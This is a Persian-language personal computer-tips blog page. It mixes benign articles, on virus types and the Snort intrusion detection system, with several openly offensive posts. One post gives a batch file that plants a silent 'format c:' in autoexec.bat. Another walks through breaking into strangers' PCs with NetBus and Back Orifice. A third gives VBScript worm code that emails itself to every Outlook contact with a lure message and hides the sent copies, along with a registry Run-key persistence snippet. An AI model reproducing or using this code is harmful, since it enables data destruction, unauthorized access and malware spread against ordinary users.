و همه مراحل قبل را انجام دهيد. اين دستور هم از هر دو راه فوق قابل اجرا است. حالا ميرسيم به نكات تكميلي در مورد مقالات اين يك هفته:
خيلي ها سوال ميكنند كه چگونه ميتوان براي BatchFile ها آيكون انتخاب كرد. بايد بگويم يكي از ساده ترين روشها كه به هيچ نرم افزار خاصي نياز ندارد اين است كه شما از BatchFile مورد نظر يك Shortcut بسازيد و براي Shortcut براحتي آيكون انتخاب كنيد و فايل اصلي را Hidden كنيد .
تا به حال هيچ به اين فكر افتاده ايد كه اگر در كامپيوتري Notepad و Wordpad و Microsoft Word نصب نشده باشد شما اين همه ترفند را كجا ميخواهيد پياده كنيد؟؟؟!!!. آيا ميدانيد هكرها معمولا در محيط متني ديگري بجز اينها اقدام به نوشن برنامه ميكنند؟؟. بله اين محيط متني به نسبت ناشناخته همان اديتور داس Dos Editor است. شما در اين اديتور ميتوانيد كد برنامه ها را ببينيد!. براي وارد شدن به اين محيط وارد داس شويد و تايپ كنيد Edit صبر كنيد!!!قبل از اينكه وارد اين محيط شويد بايد بدانيد بر خلاف محيط بي آزار نت پد محيط Dos Editor بسيار بسيار خطرناك است. هرگونه تغييري كه خواسته يا ناخواسته در متن كد ها بوجود آوريد امكان هيچگونه بازگشت ندارد اينجا از كليدي به نام Undo خبري نيست!! همچنين همه تغييرات بطور خودكار سيو ميشود و هيچگاه موقع خروج از اديتور ازشما سوال نميشود كه Do you want to save changes و همه چيز بطور خودكار ذخيره شده و اگر احيانا كد فايل هاي اصلي سيستم را دستكاري كنيد حتي System Restore و Backup هاي رجيستري هم به دادتان نخواهند رسيد... اما براي اينكه كار با اديتور آشنا شويد و خودتان ترفندي كشف كنيد مطابق زير عمل كنيد:
1-
وارد داس شويد و تايپ كنيد Edit تا وارد اديتور شويد كه صفحه اي آبي رنگ است
2-
از منوي بالاي صفحه File را انتخاب و روي Open كليك كنيد.
3-
به اين مسير برويد:C / WINDOWS و در پنجره سمت چپ دنبال فايلي به نام explorer.scf بگرديد اگر يادتان باشد شما در مقالات قبلي فايل ديگري را نيز با پسوند scf ساخته بوديد... يادتان مي آيد؟؟آيكون Show Desktop بود.
4-
متني كه در آن ميبينيد را عينا درون Notepad وارد كنيد و فايل خود را باهمان پسوند scf سيو كنيد. به اين طريق برنامه explorer.scf بر روي صفحه ظاهر ميشود.. بله شما اولين ترفند خود را خودتان ساختيد!!! به اين وسيله شما ميتوانيد خودتان در Notepad ترفند كشف كنيد!!!! من هم به همين طريق اين ترفندها را براي شما مي نوشتم.

 


 

 

 

با یک کلیک هارد را فرمت کنید!!!

سلامی از روی ارادت و نه از روی عادت به تمامی دوستان عزیز که به من لطف دارید

دوستان اگر میخواهید با یک کلیک هاردتان Format (پاک) شود این کدها را در Note

pad ریخته و آنرا با پسوند Bat ذخیره کنید مثلا Format Hard.bat حال مواظب باشید

 که روی آن کلیک نکنید چون هارد شما صفر کیلومتر خواهد شد موفق باشید در پناه

حق!

@echo off
call attrib -r -h c:\autoexec.bat
echo @echo off >c:\autoexec.b
echo format /autotest c:/q>nul
call attrib +r +h c:\autoexec.ba
exit


 

 

 
سلام دوباره به شما عزيزان.شما با اين آموزش می توانيد بدون ارسال فايل و کاملا باکلاس پسورد اینترنت مردم رو هک کنید.اينم بگم كه این کار خیلی بی رحمانه هست و به من هیچ ربطی نداره!!!!!!!!
ما به این برنامه ها احتیاج داریم که همش تو خود ویندوز هست: BACK ORFICE. Wingate.Netbus.Telnet
اول وارد Wingate شده و در جایی که نوشته شده HOST NAME آی پی قربانی رو قرار می دیم و در قسمت بعدی به Scan port رفته و Defualt برنامه که Port 23 هست رو به 12345 تغییر میدهیم و گزینه سوم که try to open port only هست را انتخاب و اسکن رو بزنید. البته در اينجا ميتونيد از يه RANGE IP هم استفاده كنيد وهم مي تونيد اي پي قرباني رو بدهيد و در صورت باز بودن پورت ميتونيد مراحل بعدي رو اجرا كنيد. حالا ما فرض رو بر اين ميذاريم كه يه Range Ip دادیم. بعد از اسکن شما با قسمتی به نام Server Found مواجه می شوید که یکسری آی پی را با پورتهای باز مورد نظر شما پیدا کرده که در ادامه باید یکی از آی پی هارو به دلخواه انتخاب کنید.
در قسمت بعدي NETBUS را باز كرده و در جاي Hostname/IP اي پي مورد نظر را وارد كنيد و در ادامه ي كار اگر از شما پسسورد بخواهد بايد از Telnet استفاده كنيد و اگر نخواهد كه كار تقريبا تمومه . حالا فرض ميكنيم كه پسسورد خواست بايد مراحل زير را طي كنيد:

به قسمت RUN رفته و CMD را اجرا كرده و بعد Telnet را اجرا كنيد و اي پي را نوشته و بعد از پرت 12345 استفاده كنيد در پنجره Netbus براي كرك پسوورد اين نوشته را وارد كنيد: Password;1;123serverPWD;Y4hoo

شما ميتونيد پسورد ديگه اي هم بذاريد حالا با Netbus دوباره وصل شده و پسورد را Y4hoo ميزنيد

همه چيز در دست شماست

حالا به قسمت File Manager رفته و سرور را به سيستم طرف ارسال كنيد و در قسمتي كه از شما پرسيد سرور را به كجا بفرستم شما ادرس C:Windows را ميدهيد .و قسمت دانلود را ميبنديم . حالا كارمون با Netbus تموم شد .

حالا به BACK ORFICE ميريم و در قسمت Target Host اي پي طرفو ميزنيم و پرت 12345 و باز در قسمت بعدي پسورد را زده و SEND را ميزنيم

با اين روش كارهاي زيادي ميشه انجام داد !
امیدوارم که خوشتون اومده باشه. تا مقاله بعدی فعلا بای.

 

ویروس

صفحه اصلی

ویروس و ضدویروس

حجم عظیم ویروس ها، کرم ها، ایرادات نرم افزارها و تهدیدهای ناشی از آنها، نرم افزارهای ضدویروس را تبدیل به یکی از ابزارهای لازم برای همه کامپیوترها نموده است. در صورت آلوده شدن یک کامپیوتر به ویروس بسته به نوع آن ممکن است مصائب مختلفی برای سیستم کامپیوتری بوجود آید که در پاره ای موارد جبران آن ها هزینه های زیادی را تحمیل می کند. آسیب های بعضی از ویروس ها به گونه ای است که آثار سوء آن ها را به هیچ وجه نمی توان از بین برد. مستقل از نوع ویروسی که باید با آن مقابله شود نیاز به برنامه های ضد ویروس همواره وجود دارد و در شرایطی که محصولات ضد ویروس متنوعی تولید شده اند، انتخاب نرم افزار مناسب دغدغه کاربران می باشد.

این مقاله ضمن معرفی انواع ویروس ها، نحوه عمل کرد برنامه های ضدویروس و انواع ویروس هایی که ضدویروس ها شناسایی و پاکسازی می کنند را معرفی می کند. همچنین اطلاعاتی که برای انتخاب ابزار مناسب لازم است بیان شده و تعدادی از برنامه های ضد ویروس با هم مقایسه  خواهند شد.

ویروس چیست؟

ویروس های کامپیوتری برنامه هایی هستند که مشابه ویروس های بیولوژیک گسترش  یافته و پس از وارد شدن به کامپیوتر اقدامات غیرمنتظره ای را انجام می دهند. با وجودی که همه ویروس ها خطرناک نیستند، ولی بسیاری از آنها با هدف تخریب انواع مشخصی از فایل ها، برنامه های کاربردی و یا سیستم های عامل نوشته شده اند.

 ویروس ها هم مشابه همه برنامه های دیگر از منابع سیستم مانند حافظه و فضای دیسک سخت، توان پردازنده مرکزی و سایر منابع بهره می گیرند و می توانند اعمال خطرناکی را انجام دهند به عنوان مثال فایل های روی دیسک را پاک کرده و یا کل دیسک سخت را فرمت کنند. همچنین یک ویروس می تواند مجوز دسترسی به دستگاه را از طریق شبکه و بدون احراز هویت فراهم آورد.

برای اولین بار در سال ۱۹۸۴ واژه «ویروس» در این معنا توسط فرد کوهن در متون آکادمیک مورد استفاده قرار گرفت. د‍ر این مقاله که «آزمایشاتی با ویروس های کامپیوتری» نام داشت نویسنده دسته ای خاص از برنامه ها را ویروس نامیده و این نام گذاری را به لئونارد آدلمن نسبت داده است. البته قبل از این زمان ویروس ها در متن داستان های عملی و تخیلی ظاهر شده  بودند.

انواع ویروس

انواع ویروس های رایج را می توان به دسته های زیر تقسیم بندی نمود:

boot sector :

 boot sector  اولین Sector  بر روی فلاپی و یا دیسک سخت کامپیوتر است. در این قطاع کدهای اجرایی ذخیره شده اند که فعالیت کامپیوتر با استفاده از آنها انجام می شود. با توجه به اینکه در هر بار بالا آمدن کامپیوتر Boot sector مورد ارجاع قرار می گیرد، و با هر بار تغییر پیکربندی کامپیوتر محتوای boot sector هم مجددا نوشته می شود، لذا این قطاع مکانی بسیار آسیب پذیر در برابر حملات ویروس ها می باشد.

این نوع ویروس ها از طریق فلاپی هایی که قطاع boot آلوده دارند انتشار می یابند. Boot sector  دیسک سخت کامپیوتری که  آلوده شود توسط ویروس آلوده شده و هر بار که کامپیوتر روشن می شود، ویروس خود را در حافظه بار کرده و منتظر فرصتی برای آلوده کردن فلاپی ها می ماند تا بتواند خود را منتشر کرده و دستگاه های دیگری را نیز آلوده نماید. این گونه ویروس ها می توانند به گونه ای عمل کنند که تا زمانی که دستگاه آلوده است امکان boot  کردن کامپیوتر از روی دیسک سخت از بین برود.

این ویروس ها بعد از نوشتن بر روی متن اصلی boot سعی می کنند کد اصلی را به قطاعی دیگر بر روی دیسک منتقل کرده و آن قطاع را به عنوان یک قطاع خراب (Bad Sector) علامت گذاری می کند.

Macro viruses:

 این نوع ویروس ها مستقیما برنامه ها را آلوده نمی کنند. هدف این دسته از ویروس ها فایل های تولید شده توسط برنامه هایی است که از زبان های برنامه نویسی ماکرویی مانند مستندات Exel یا Word استفاده می کنند. ویروس های ماکرو از طریق دیسک ها، شبکه و یا فایل های پیوست  شده با نامه های الکترونیکی قابل گسترش می باشد.

ویروس تنها در هنگامی امکان فعال شدن را دارد که فایل آلوده باز شود، در این صورت ویروس شروع به گسترش خود در کامپیوتر نموده و سایر فایل های موجود را نیز آلوده می نماید. انتقال این فایل ها به کامپیوتر های دیگر و یا اشتراک فایل بین دستگاه های مختلف باعث گسترش آلودگی به این ویروس ها می شود.

File infecting viruses:

 فایل های اجرایی (فایل های با پسوند .exe و .com) را آلوده نموده و همزمان با اجرای این برنامه ها خود را در حافظه دستگاه بار نموده و شروع به گسترش خود و آلوده کردن سایر فایل های اجرایی سیستم می نمایند. بعضی از نمونه های این ویروس ها متن مورد نظر خود را به جای متن فایل اجرایی قرار می دهند.

ویروس های چندریخت(Polymorphic):

این ویروس ها در هر فایل آلوده به شکلی ظاهر می شوند. با توجه به اینکه از الگوریتم های کدگذاری استفاده کرده و ردپای خود را پاک می کنند، آشکارسازی و تشخیص این گونه ویروس ها دشوار است.

ویروس های مخفی:

این ویروس ها سعی می کنند خود را از سیستم عامل و نرم افزارهای ضدویروس مخفی نگه دارند. برای این کار ویروس در حافظه مقیم شده و حائل دسترسی به سیستم عامل می شود. در این صورت ویروس کلیه درخواست هایی که نرم افزار ضدویروس به سیستم عامل می دهد را دریافت می کند. به این ترتیب نرم افزارهای ضدویروس هم فریب خورده و این تصور به وجود می آید که هیچ ویروسی در کامپیوتر وجود ندارد. این ویروس ها کاربر را هم فریب داده و استفاده از حافظه را به صورت مخفیانه انجام  می دهند.

ویروس های چندبخشی

رایج ترین انواع این ویروس ها ترکیبی از ویروس های boot sector  و file infecting  می باشد. ترکیب انواع دیگر ویروس ها هم امکان پذیر است.

سایر برنامه های مختل کننده امنیت

برخی از محققین اسب های تروا(Trojan)، کرم ها و بمب های منطقی را در دسته ویروس ها قرار نمی دهند ولی واقعیت این است که این برنامه ها هم بسیار خطرناک بوده و می توانند خساراتی جدی به سیستم های کامپیوتری وارد نمایند.

اسب های تروا تظاهر می کنند که کاری خاص را انجام می دهند ولی در عمل برای هدف دیگری ساخته شده اند، به عنوان مثال برنامه ای که وانمود می کند که یک بازی است ولی در واقع اجازه دسترسی از راه دور یک کاربر به کامپیوتر را فراهم می آورد.

   کرم ها برنامه هایی هستند که مشابه ویروس ها توان تکثیر کردن خود را دارند، ولی برعکس آنها برای گسترش خود نیاز به برنامه هایی دیگر ندارند تا آنها را آلوده کرده و تحت عنوان فایل های آلوده اقدام به انتقال و آلوده کردن دستگاه های دیگر نمایند. کرم ها معمولا از نقاط آسیب پذیر برنامه های e-mail  برای توزیع سریع و وسیع خود استفاده می نمایند.

   بمب های منطقی برنامه هایی هستند که در زمان هایی از قبل تعیین شده؛ مثلا یک روز خاص؛ اعمالی غیر منتظره انجام می دهند. این برنامه ها فایل های دیگر را آلوده نکرده و خود را گسترش نمی دهند.

علی رغم تنوع انواع برنامه های مخرب، برنامه های قوی ضد ویروس می توانند نسخه های مختلف آنها را شناسایی و از بین ببرند. در ادامه این متن برای سادگی به همه انواع این برنامه ها عنوان عمومی ویروس اطلاق می شود.

در بخش های بعدی نرم افزارهای ضدویروس مورد بررسی قرار خواهند گرفت.

 


 

Snort، نمونه‌ای از یک ابزار تشخیص نفوذ شبکه‌ای

 

 

    یک نرم‌افزار تشخیص نفوذ به‌صورت کدباز است که بر روی محیط‌های Linux و Windows عرضه می‌گردد و با توجه به رایگان بودن آن، به یکی از متداول‌ترین سیستم‌های تشخیص نفوذ شبکه‌های رایانه‌یی مبدل شده است. از آن‌جاکه برای معرفی آن نیاز به معرفی کوتاه این دسته از ابزارها داریم، ابتدا به مفاهیمی اولیه درباره‌ی ابزارهای تشخیص نفوذ می‌پردازیم، به عبارت دیگر معرفی این نرم‌افزار بهانه‌یی است برای ذکر مقدمه‌یی در باب سیستم‌های تشخیص نفوذ.

    Intrusion Detection System (IDS) یا سیستم تشخیص نفوذ به سخت‌افزار، نرم‌افزار یا تلفیقی از هر دو اطلاق می‌گردد که در یک سیستم رایانه‌یی که می‌تواند یک شبکه‌ی محلی یا گسترده باشد، وظیفه‌ی شناسایی تلاش‌هایی که برای حمله به شبکه صورت‌ می‌گیرد و ایجاد اخطار احتمالی متعاقب حملات، را بر عهده دارد.

    IDSها عملاً سه وظیفه‌ی کلی را برعهده دارند : پایش، تشخیص، واکنش. هرچند که واکنش در مورد IDSها عموماً به ایجاد اخطار، در قالب‌های مختلف، محدود می‌گردد. هرچند دسته‌یی مشابه از ابزارهای امنیتی به نام Intrusion Prevention System (IPS) وجود دارند که پس از پایش و تشخیص، بسته‌های حمله‌های احتمالی را حذف می‌کنند. نکته‌یی که در این میان باید متذکر شد، تفاوت و تقابل میان Firewallها و IDSها است. از آن‌جاکه ماهیت عمل‌کرد این دو ابزار با یکدیگر به کلی متفاوت است، هیچ‌یک از این دو ابزار وظیفه‌ی دیگری را به طور کامل برعهده نمی‌گیرد، لذا تلفیقی از استفاده از هردو ابزار می‌تواند امنیت کلی سیستم را بالا ببرد.

 

    در حالت کلی IDSها را می‌توان به دو دسته‌ی کلی تقسیم‌بندی نمود :

- Network IDS (NIDS)

- Host IDS (HIDS)

    HIDSها، اولین سیستم IDSی هستند که در یک سیستم رایانه‌ای باید پیاده‌سازی شود. معیار تشخیص حملات در این سیستم‌ها، اطلاعات جمع‌آوری شده بر روی خادم‌های مختلف شبکه است. برای مثال این سیستم با تحلیل صورت عملیات انجام شده، ذخیره شده در پرونده‌هایی خاص، سعی در تشخیص تلاش‌هایی که برای نفوذ به خادم مذکورد انجام شده است دارد. این تحلیل‌ها می‌تواند به صورت محلی بر روی خود خادم انجام گردد یا به سیستم تحلیل‌گر دیگری برای بررسی ارسال شود. یک HIDS می‌تواند تحلیل اطلاعات بیش از یک خادم را بر عهده بگیرد.

 

    با این وجود، اگر نفوذ‌گر جمع‌آوری صورت عملیات انجام‌شده بر روی هریک از خادم‌های مورد نظر را به نحوی متوقف کند، HIDS در تشخیص نفوذ ناموفق خواهد بود و این بزرگ‌ترین ضعف HIDS است.

    NIDSها، به عنوان دومین نوع IDSها، در بسیاری از موارد عملاً یک Sniffer هستند که با بررسی بسته‌ها و پروتکل‌های ارتباطات فعال، به جستجوی تلاش‌هایی که برای حمله صورت می‌گیرد می‌پردازند. به عبارت دیگر معیار NIDSها، تنها بسته‌هایی است که بر روی شبکه‌ها رد و بدل می‌گردد. از آن‌جایی‌که NIDSها تشخیص را به یک سیستم منفرد محدود نمی‌کنند، عملاً گسترده‌گی بیش‌تری داشته و فرایند تشخیص را به صورت توزیع‌شده انجام می‌دهند. با این وجود این سیستم‌ها در رویایی با بسته‌های رمزشده و یا شبکه‌هایی با سرعت و ترافیک بالا کارایی خود را از دست می‌دهند.

 

    با معرفی انجام شده در مورد دو نوع اصلی IDSها و ضعف‌های عنوان شده برای هریک، واضح است که برای رسیدن به یک سیستم تشخیص نفوذ کامل، به‌ترین راه استفاده‌ی همزمان از هر دو نوع این ابزارهاست.

 

     Snort، در کامل‌ترین حالت نمونه‌یی از یک NIDS است. این نرم‌افزار در سه حالت قابل برنامه‌ریزی می‌باشد :

  • حالت Sniffer

    در این حالت، این نرم‌افزار تنها یک Sniffer ساده است و محتوای بسته‌های ردوبدل شده بر روی شبکه را بر روی کنسول نمایش می‌دهد.

  • حالت ثبت‌کننده‌ی بسته‌ها

Snortدر این وضعیت، اطلاعات بسته‌های شبکه را در پرونده‌یی که مشخص می‌شود ذخیره می‌کند.

  •  سیستم تشخیص نفوذ

    در این پیکربندی، بر اساس دو قابلیت پیشین و با استفاده از قابلیت تحلیل بسته‌ها و قوانینی که تعیین می‌گردد، Snort امکان پایش و تحلیل بسته و تشخیص نفوذ را یافته و در صورت نیاز واکنش تعیین شده را به‌روز می‌دهد.

 

    حالت پیش‌فرض خروجی این ابزار فایلی متنی است که می‌تواند در آن ابتدای بسته‌ها را نیز درج کند. با این وجود در صورتی‌که این ابزار در حال فعالیت بر روی ارتباطات شبکه‌یی با سرعت بالا می‌باشد به‌ترین راه استفاده از خروجی خام باینری و استفاده از ابزاری ثانویه برای تحلیل و تبدیل اطلاعات خروجی است.

 

    بُعد دیگر از پیکربندی Snort به عنوان یک سیستم تشخیص نفوذ، استفاده از قوانین برای ایجاد معیار نفوذ برای Snort است. برای مثال می‌توان با قانونی، Snort را مکلف ساخت که نسبت به دسترسی‌های انجام شده مبتنی بر پروتکلی تعیین شده از/به یک پورت خاص و از/به یک مقصد معین با محتوایی شامل رشته‌یی خاص، اخطاری یا واکنشی ویژه را اعمال کند.

 

    نکته‌یی که باید در نظر داشت این‌ است که از آن‌جاکه Snort را می‌توان به گونه‌یی پیکربندی نمود که قابلیت تشخیص حمله توسط ابزارهای پویش پورت را نیز داشته باشد، لذا با وجود استفاده از Snort نیازی به استفاده از ابزاری ثانویه برای تشخیص پویش‌گرهای پورت وجود ندارد.

 

    همان‌گونه که گفته شد، Snort با قابلیت‌های نسبتاً کاملی که در خود جای داده‌است، به همراه رایگان بودن آن و قابلیت نصب بر روی محیط‌ها و سیستم‌های عامل متدوال، به یکی از معمول‌ترین IDSهای کنونی مبدل شده است. برای دریافت این نرم‌افزار و همچنین اطلاعات جامعی در مورد آن می‌توانید به پای‌گاه اصلی آن، www.snort.org، مراجعه کنید.

 


اموزش : برنامه خود را از طریق ادرس ایمیل دیگران در تمام جهان پخش کنید

شما با استفاده از اتلوک اکسپرس می تونید برنامه به ویژه ویروس خودتون رو در سرار جهان پخش کنید این روشی که من الان می نویسم یکی از روش های پخش ویروس هاست ولی خوب با استفاده از این روش می تونید برنامه یا هرچی رو در تمام جهان پخش کنید

Code:
Set OutlookApp = CreateObject("Outlook.Application") If Not OutlookApp = "" Then For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists For UserGroup = 1 To ContactSwitch.AddressEntries.Count Set OutlookEmail = OutlookApp.CreateItem(0) OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup) OutlookEmail.Subject = "Check this out!" OutlookEmail.Body = "Look at the file in the attachments, It's great! :P" OutlookEmail.Attachments.Add WScript.ScriptFullName OutlookEmail.DeleteAfterSubmit = True OutlookEmail.Send Next Next End If OutlookEmail.Subject = "Check this out!" OutlookEmail.Body = "Look at the file in the attachments, It's great! :P" OutlookEmail.Attachments.Add WScript.ScriptFullName

اگه متوجه نشدید ناراحت نشید چون قرار نیست که همه متوجه بشن اگه این طوری باشه همه ملت ویروس نویس می شن فقط اونهای که تو این کار (ویروس نویسی ) هستن می دونن این کد چه ارزشی داره . در ضمن تا یادم نرفته اقا من ویروس نویس نیستم ( نکنه یه دفعه برام ویروس بفرستن حالم رو بگیرن ) من برای تفریح با این ویروس ها ور می رفتم ازشون یه چیز های یاد گرفتم
خوب چون این تاپیک به درد تازه کار ها هم خوره یه اموزش مقدماتی می دم که برای ویروس نویسی هم به کار می یاد
1)اجرای برنامه در استارتاپ:
با استفاده از کد زیر می تونید برنامه ای که می نویسید تو استارتاپ قرار بدید

Code:
Set Reg = CreateObject("wscript.shell") Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"

نوشته شده توسط اسماعیل هاشمی در پنجشنبه سوم دی 1383

 

 

مطالب پيشين

آموزش پاسكال - قسمت اول
شما کدامیک از آنتی ویروس های موجود را پیشنهاد می کنید؟
18 آبان / اپديت Nod32
بانک اطلاعات معماری شماره یک
مثال عینی مفهوم وراثت در ++C
16 آبان / اپديت Nod32
با افزودن پسورد دوم براي ورود به ویندوز XP امنیت خود را بالا ببرید ...
دليل مهم براي نصب Xp Service pack 2
حل تمرين برنامه سازی پیشرفته
دانلود جزوات بسیار عالی و مرتب آموزش ‍++C‍‍
12 آبان / اپديت Nod32
نحوه از بین بردن ویروس کظم غیظ (Kazme_Gheyz) چگونه است؟
انتقال Update آنتی ویروس ESET Nod32
9 آبان / اپديت Nod32
حملات DoS


  درباره

ورود به كنترل پنل



سرور کسی نیست جز خدای بخشنده و مهربان

اولين پايگاه آموزشي شهرستان گچساران با 5 سال سابقه فعاليت

اين وب سایت ، فضايی است برای انتشار لينک‌های مفيد؛ معرفی هرچه که خواندنی، ديدنی يا شنيدنی ا‌ست. اين وب سایت به هدف آگاهی‌رسانی و بازتاب‌دادنِ مطالب خواندنی در فضای رايانه‌ای شکل گرفته است. "گچساران18"‌ یک نهاد یا یک کانون نیست؛ تنها یک "وب سایت اموزشی" ‌است و کم‌ترین تعهدی به هیچ‌یک از نهادها، گروه‌ها، اشخاص و تفکرها ندارد. اين وبلاگ، به‌طور مستقل و بدون صافی عمل می‌کنند و طبيعی است که هر کس سليقه‌ی خود را در انتخاب مطالب در پيش گيرد. اين کار ، نماينده‌ی هيچ تشکّل و انديشه ويژه‌ی سياسی، فرهنگی يا قومی نيست. فقط معرف شهر گچساران به بازدید کننده است .

___________________________

انجام كليه پروژه های دانشجوی در حداقل زمان ممکن

سفارش برنامه نويسي (دانشجويي ، كاربردي ) پذيرفته مي شود .

پيشرفته ، متوسط ، مقدماتي


آدرس: شهرستان گچساران/ بلوار ولي عصر(خيابان شيراز)/ پاساژ گلستان/كافي نت جگوار

همراه : ۰۹۳۶۶۴۰۲۱۶۸
تلفن : ۲۲۳۰۱۲۱-۰۷۴۲



با کمال تشکر مدیریت گچساران 18 (اسماعیل هاشمی - دانشجوي كامپيوتر دانشگاه آزاد گچساران)


Www.Hashemi64.ir

esmail.hashemi@gmail.com

  لوگوي ما
پرتال تخصصی کامپیوتر    Www.Hashemi64.ir


  نمونه كاري هاي طراحي

پرتال شهداي گچساران

وبلاگ محسن نامجو

دست نوشته هاي آخرين ديوانه

روز نوشته هاي يك دانشجو (سياسي)

ارسال پيغام مستقيم به ايمل مديريت

سفارش برنامه نويسي

.:: تمام پيوند هاي روزانه ::.


  آمار بازديد

نويسندگان :
» اسماعیل هاشمی
» كاربر مهمان

آمار بازديد :

» کاربر: مهمان


با عضويت در خبرنامه از امكانات اين وب و ديگر وب سايت هاي تحت مديريت اينجانب برخوردار مي شويد موارد زير : عــکــسهای داغ روز مطالب سرگرم کننده داغ ترین خبرهای روز دنیا کمیاب ترین کلیپ های موبایل به ایمیل شما ارسال می شوند.





Powered by WebGozar

من در سايت متخصصين ايران



 

صفحه اصلي |  پست الکترونيک |  اضافه به علاقه مندي ها | ذخيره صفحه | طراح قالب

 

Powered By blogfa.com Copyright © 2009 by Esmail hashemi
This Themplate  By گچساران 18